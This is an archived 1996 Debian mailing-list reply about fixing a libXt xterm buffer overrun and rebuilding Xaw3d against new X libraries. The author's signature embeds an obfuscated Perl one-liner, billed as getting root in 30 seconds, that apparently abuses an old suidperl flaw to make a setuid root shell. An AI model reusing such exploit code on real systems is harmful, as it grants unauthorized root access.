Re: Xt xterm security hole

To: Larry 'Daffy' Daffner <vizzie@airmail.net>
Cc: Bruce Perens <Bruce@Pixar.com>, Debian developers list <debian-devel@lists.debian.org>, Daniel Quinlan <quinlan@pathname.com>
Subject: Re: Xt xterm security hole
From: Joey Hess <joey@kite.ml.org>
Date: Sat, 23 Nov 1996 00:21:38 -0500 (EST)
Message-id: <Pine.LNX.3.95.961123002010.533L-100000@kite.ml.org>
In-reply-to: <m0vRALD-0002jTC@pinky.mimosa.org>

> 3) There's no xaw3D or xaw95 6.1 libs, which means that the athena
>    replacements get overriden by the new 3.2 libs
> 
> The first 2 are only dependency issues, and I believe that 3.2-1
> provides xlib which would fix #2.  #1 shoould be fixable by simply
> fixing that dependency. So the only issue I see is #3, which is
> cosmetic, but will probaby annoy people and cause questions.
> 
> If we're voting on this, I would say that fixing the libXt buffer
> overrun security problem more than offsets #3, although every effort
> should be made to correct that if possible.

Fixing #3 is quite easy. To get xaw3d to work, I made a one line change to
debian/rules and rebuilt the package. I'd guess xaw95 is similar.

-- 
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod            jeh22@cornell.edu
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_
# Get root in 30 seconds or less. Fix this hole: upgrade to perl 5.003 today..
      "How appropriate, you fight like a cow.." - - Guybrush Threepwood


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-REQUEST@lists.debian.org . Trouble? e-mail to Bruce@Pixar.com

Reply to:

Follow-Ups:
- Re: Xt xterm security hole
  - From: "Larry 'Daffy' Daffner" <vizzie@airmail.net>

References:
- Re: Xt xterm security hole
  - From: "Larry 'Daffy' Daffner" <vizzie@airmail.net>

Prev by Date: Re: Xt xterm security hole
Next by Date: Re: Xt xterm security hole
Previous by thread: Re: Xt xterm security hole
Next by thread: Re: Xt xterm security hole
Index(es):
- Date
- Thread